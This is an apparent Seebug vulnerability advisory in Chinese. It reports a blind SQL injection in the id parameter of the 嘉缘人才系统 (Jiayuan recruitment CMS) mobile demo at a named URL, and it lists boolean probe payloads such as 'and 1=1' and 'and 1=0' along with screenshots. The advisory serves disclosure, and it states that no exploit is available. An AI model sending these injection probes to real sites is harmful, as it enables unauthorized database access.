嘉缘人才系统1处SQL注入#3(demo测试)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 嘉缘人才系统1处SQL注入. 官网DEMO测试。 ### 详细说明: 嘉缘人才系统触屏版demo: ``` http://m.rccms.com/person/resume.php?id=696 ``` 参数id可以盲注。 ``` http://m.rccms.com/person/resume.php?id=696%20and ``` 会报告SQL错误。 [<img src="https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png) ``` http://m.rccms.com/person/resume.php?id=696%20and%201=1 ``` 可以正常显示。 [<img src="https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png) ``` http://m.rccms.com/person/resume.php?id=696%20and%201=0 ``` 显示参数错误。 [<img src="https://images.seebug.org/upload/201411/192103013b5f7dd47270178fceed0c50f5c8de81.png" alt="4.png" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息